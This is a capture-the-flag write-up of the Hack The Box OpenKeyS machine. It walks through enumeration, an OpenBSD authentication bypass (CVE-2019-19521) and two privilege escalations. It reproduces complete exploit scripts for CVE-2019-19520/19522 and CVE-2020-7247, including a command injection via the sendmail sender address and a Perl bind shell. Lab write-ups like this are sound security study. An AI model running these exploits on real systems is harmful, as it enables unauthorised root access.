HTB OpenkeyS Writeup

Enumeration

nmap -sC -sV 10.10.10.199

Ports 22 and 80 are open, which are associated with SSH and HTTP Server. We can see the page is redirected to http://10.10.10.199/index.php

The first thing I saw was the website title

OpenKeyS – Retrieve your OpenSSH Keys

Tried SQLi here but couldn’t find anything, thought of trying something else. Quickly ran Dirb on it.
Found a directory http://10.10.10.199/includes/ with Dirb

Here we can see 2 files
auth.php –> has nothing in it
auth.php.swp –> This is intresting let’s download it.
Checking file contents

user Jennifer caught my eyes and saved this on my note maybe there’s a user with this name on the machine.

I’ve read somewhere that .swp files can be read by using vim
vim -r auth.php.swp
Now, we have a code of 59 lines

<?php
function authenticate($username, $password)
{
    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
    system($cmd, $retcode);
    return $retcode;
}

function is_active_session()
{
    // Session timeout in seconds
    $session_timeout = 300;

    // Start the session
    session_start();

    // Is the user logged in? 
    if(isset($_SESSION["logged_in"]))
    {
        // Has the session expired?
        $time = $_SERVER['REQUEST_TIME'];
        if (isset($_SESSION['last_activity']) &amp;&amp; 
            ($time - $_SESSION['last_activity']) > $session_timeout)
        {
            close_session();
            return False;
        }
        else
        {
            // Session is active, update last activity time and return True
            $_SESSION['last_activity'] = $time;
            return True;
        }
    }
    else
    {
        return False;
    }
}

function init_session()
{
    $_SESSION["logged_in"] = True;
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["username"] = $_REQUEST['username'];
}

function close_session()
{
    session_unset();
    session_destroy();
    session_start();
}


?>

Saw a line /auth_helpers/check_auth in the file but that’s a rabbit hole let’s skip that part.
I was stuck here for much time then I thought of trying google search about what I have till now like

  • There’s something related to Openssh (After reading the website title)
  • The machine is based on OpenBSD
  • A login page and files related to “auth”

Made some random searches with keywords like that “OpenBSD auth exploit” and “PHP OpenBSD auth exploit”
Both of the searches were pointing towards an article which was an Authentication Bypass and Local Privilege Escalation

Foothold

CVE-2019-19521

OpenBSD Authentication Bypass and Local Privilege Escalation Vulnerabilities

Basically if an attacker specifies the username ‘-schallenge’ or ‘-schallenge:passwd’ for force passwd-style auth, it leads to a successful authentication bypass.
I tried this and worked

But we’re not greeted with an ssh key but Authentication Bypass worked.
This is because we have to specify the username to get the ssh keys.
While reading contents of auth.php.swp file we had a username in it which was *jennifer*
Sometimes there are multiple parameters in Cookie header separated by semicolon but the problem is how to pass the the user jennifer.

From past CTF experiences i tried following things
  • Tried decoding the PHPSESSID value to get the Algorithm (Didn’t work)
  • Tried Encoding the user in base64 and passed (Failed again)
  • Tried Passing the 'username=jennifer' in plaintext (Worked)


'Cookie: PHPSESSID=emaf9tcrvqpujc32q6vu8edn6g;username=jennifer'

Now i have the SSH key for the user jennifer.

SSH as user jennifer

Privilege Escalation

While reading the Secpod’s article for Authentication Bypass i saw 3 other exploits based on the same OpenBSD version.

CVE-2019-19522: Local privilege escalation via S/Key and YubiKey

A quick google search landed me to this github repository. But this doesn’t have the same version exploit so i opened up the code for CVE-2019-19520 in the repository and saw he combined 2 exploits in one scripts

  • CVE-2019-19520: Local privilege escalation via xlock
  • CVE-2019-19522: Local privilege escalation via S/Key and YubiKey
echo "openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)"

echo "[*] checking system ..."

if grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q yubikey ; then
  echo "[*] system supports YubiKey authentication"
  target='yubikey'
elif grep auth= /etc/login.conf | fgrep -Ev "^#" | grep -q skey ; then
  echo "[*] system supports S/Key authentication"
  target='skey'
  if ! test -d /etc/skey/ ; then
    echo "[-] S/Key authentication enabled, but has not been initialized"
    exit 1
  fi
else
  echo "[-] system does not support S/Key / YubiKey authentication"
  exit 1
fi

echo "[*] id: `id`"

echo "[*] compiling ..."

cat > swrast_dri.c << "EOF"
#include <paths.h>
#include <sys/types.h>
#include <unistd.h>
static void __attribute__ ((constructor)) _init (void) {
    gid_t rgid, egid, sgid;
    if (getresgid(&amp;rgid, &amp;egid, &amp;sgid) != 0) _exit(__LINE__);
    if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
    char * const argv[] = { _PATH_KSHELL, NULL };
    execve(argv[0], argv, NULL);
    _exit(__LINE__);
}
EOF

cc -fpic -shared -s -o swrast_dri.so swrast_dri.c
rm -rf swrast_dri.c

echo "[*] running Xvfb ..."

display=":66"

env -i /usr/X11R6/bin/Xvfb $display -cc 0 &amp;

echo "[*] testing for CVE-2019-19520 ..."

group=$(echo id -gn | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display)

if [ "$group" = "auth" ]; then
  echo "[+] success! we have auth group permissions"
else
  echo "[-] failed to acquire auth group permissions"
  exit 1
fi

# uncomment to drop to a shell with auth group permissions
#env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display ; exit

echo
echo "WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C)."
echo
sleep 5

if [ "$target" = "skey" ]; then
  echo "[*] trying CVE-2019-19522 (S/Key) ..."
  echo "rm -rf /etc/skey/root ; echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root ; chmod 0600 /etc/skey/root" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
  rm -rf swrast_dri.so
  echo "Your password is: EGG LARD GROW HOG DRAG LAIN"
  env -i TERM=vt220 su -l -a skey
fi

if [ "$target" = "yubikey" ]; then
  echo "[*] trying CVE-2019-19522 (YubiKey) ..."
  echo "rm -rf /var/db/yubikey/root.* ; echo 32d32ddfb7d5 > /var/db/yubikey/root.uid ; echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key" | env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display $display
  rm -rf swrast_dri.so
  echo "Your password is: krkhgtuhdnjclrikikklulkldlutreul"
  env -i TERM=vt220 su -l -a yubikey
fi

Running the exploit

openkeys$ nano priv.sh
openkeys$ chmod +x priv.sh

openkeys$ ./priv.sh

ROOTED!!!

Alternative

There’s another exploit in the same repository which is again a Local Privilege Escalation.

payload="/tmp/.payload"

/bin/echo "OpenBSD 6.6 OpenSMTPD 6.6 local root exploit (CVE-2020-7247)"

/bin/echo "[*] id: `id`"

/bin/echo "[*] checking system ..."

if [ -w `dirname $payload` ]; then
  /bin/echo "[*] directory $payload is writable"
else
  /bin/echo "[-] directory $payload is not writable"
  exit 1
fi

if syspatch -l | grep -q 019_smtpd_exec ; then
  /bin/echo "[-] 019_smtpd_exec patch has been installed"
  exit 1
else
  /bin/echo "[*] 019_smtpd_exec patch has not been installed"
fi

/bin/echo "[*] writing payload to $payload ..."
cat > $payload << "EOF"
#!/bin/sh
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,1337,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
EOF
/bin/chmod +x $payload

/bin/echo "[*] executing $payload ..."
/bin/echo | /usr/sbin/sendmail -v -f "<;$payload;#@>" `whoami`

/bin/sleep 1

/bin/echo "[*] cleaning up $payload ..."
/bin/rm $payload

/bin/echo "[*] connecting to 127.0.0.1:1337 ..."
nc -v 127.0.0.1 1337

Running the exploit

openkeys$ nano privesc.sh
openkeys$ chmod +x privesc.sh

openkeys$ ./privesc.sh

Again we are root

Thanks for Reading

Leave a Reply